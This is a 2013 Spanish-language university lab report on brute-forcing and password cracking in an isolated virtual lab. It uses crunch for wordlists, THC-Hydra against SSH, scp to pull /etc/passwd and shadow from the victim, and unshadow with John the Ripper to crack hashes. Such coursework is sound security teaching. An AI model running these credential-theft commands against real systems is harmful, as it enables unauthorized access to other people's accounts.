Está en la página 1de 9

UNIVERSIDAD NACIONAL AUTONOMA DE NICARAGUA

FACULTAD DE CIENCIA Y TECNOLOGIA


ING. EN TELEMATICA


ASIGNATURA: SEGURIDAD DE REDES.
TITULO: PRACTICA 1: ATAQUES CON THC-HYDRA Y JOHN THE RIPPER.
PROFESOR(A): Msc. VALERIA MERCEDES MEDINA.
ELABORADO POR: FRANKLIN JESUS SANCHEZ SANCHEZ.
JHOSTIN ALEJANDRO MORENO ANTON.






Leon 11 de abril de 2013.
Suponga que se tiene el siguiente esquema:




Empezaremos por la creacion de las 2 maquinas virtuales, una victima y un atacant, ambas
corriendo una distribucion del S.O linux.

En la configuracion de Red de las maquinas virtuales se necesitara que ambas maquinas se puedan
comunicar entre si, permitiendo las conexiones a los diversos servicios que ofrecera la maquina
victima, la cual contara con un servicio FTP, SSH Y Web. Colocaremos el adaptador en modo host-
only ya que de esta manera las maquinas virtuales se encontraran en la misma red de la maquina
real.


Una vezrealizado lo anterior procedemos a instalar los servicios a ofrecer por la maquina
victima:
Servidor FTP
Instalacion:
sudo apt-get install vsftpd
Al instalar vsftpd se crean los siguientes archivos y directorios:
/etc/init.d/vsftpd: fichero que inicia el servidor ftp.
/usr/bin/vsftpd: archivo ejectable.
/etc/vsftpd.conf: es el fichero de configuracin del servidor.
/etc/ftpusers: fichero que contiene una lista de usuarios que no se podrn conectar al servidor.
Una vez instalado se pueden configurar varias opciones:
anonymous_enable: Permite indicar si los usuarios se conteraran de modo anonimo, por
seguridad es mejor poner el campo a NO.
local_enable=YES: Permite al acceso a usuarios locales.
write_enable=YES: Permite a los usuarios subir archivos al servidor.
max_clients: Idica el maximo numero de conexiones simultaneas permitidas por el
servidor.




Servidor Web
Instalamos apache a travez del siguiente comando:
sudo apt-get install apache2.
A continuacion se podra observar desde el navegador que el servicio web esta funcionando:



Servidor SSH
Para este servicio escojimos open-ssh, para instalarlo:
apt-get install openssh-server.
Las claves se guardan en un fichero denominado know_hosts.
Hasta el momento se han instalado los servicios, a continuacion crearemos a los usuarios
indicados por la practica.







Maquina Atacante:
En esta maquina utilizaremos las herramientas de craqueo mencionadas por la apractica. Primero
instalaremos THC-Hydra:
Descargamos el fichero tar.gz desde la web principal del programa y lo descomprimimos en un
directorio.
Finalmente, en dicho directorio, ejecutamos:
hydra-6.1-src# ./configure
hydra-6.1-src# make
hydra-6.1-src# make install.
Esta aplicacion se ejecuta mediante el comando:
hydra {OPCIONES_TAB_TARGET} -l nombreUsuario -p password
Tambien se puede usar en modo grafico ejecutando ./xhydra:


John the ripper
sudo apt-get install john
Una vez instalado, introducimos el comando con sus parmetros:
sudo unshadow /etc/passwd /etc/shadow > misclaves

Ahora ya tenemos las dos maquinas preparadas para realizar los ataques.
1. Con la herramienta crunch 3.4 generamos un diccionario para las cuentas de usuarios y
un diccionario para las password:
./crunch 6 6 -f charset.lst lalpha -o user01.txt para los usuarios.

Crunch incluye una serie de conbinaciones para generar el diccionario, estas se
encunetran en el archivo charset.lst donde la opcion lalpha permite crear combinaciones
con todas la letras del alfabeto (a-z).

./crunch 3 4 123abcd -o user01.txt para las password.

En este caso usamos nuestra propia combinacion indicandole que genera entradas con 4
combinaciones usando numeros del 1 al 3 y letras de a-d.



2. Utilizamos hydra para obtener las contraseas de protocolo SSH.
Le pasamos los diccionarios generados anteriormente la IP del servidor ssh, y indicamos
un archivo donde se guardara el resultado.




Al terminar de probar todas las entradas del diccionario el resultado fue el siguiente:


Ahora probamos conectarnos mediante SSH:
ssh eacosta@192.168.56.102

3. Una vez logeados obtenemos el passwd y shadow de las victimas para luego desifrarlas
por medio de john the ripper

scp /etc/passwd ale@192.168.56.102:/home/atacante
De esta manera nos hemos traido desde la maquina victima hacia la maquina atacante, los
archivos correspondientes y los hemos guardado en el directorio home. Ahora
procedemos a unir los ficheros con el comando unshadow

./unshadow /home/passwd /home/shadow >cifrado
Luego realizamos el ataque con john the ripper
./john cifrado


De esta manera se logran decifrar las contraseas de los usuarios.